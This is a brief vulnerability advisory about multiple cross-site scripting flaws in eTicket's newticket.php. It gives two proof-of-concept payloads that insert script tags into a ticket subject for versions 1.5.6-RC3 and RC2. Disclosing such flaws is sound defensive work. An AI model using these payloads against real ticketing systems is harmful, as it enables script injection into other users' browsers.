eTicket 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities

eTicket 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities

An attacker can use standard tools to exploit these issues.

The following proof-of-concept examples are available:

For eTicket 1.5.6-RC3: Create a ticket with the subject <SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>
For eTicket 1.5.6-RC2: Create a ticket with the subject <script>alert(123)</script>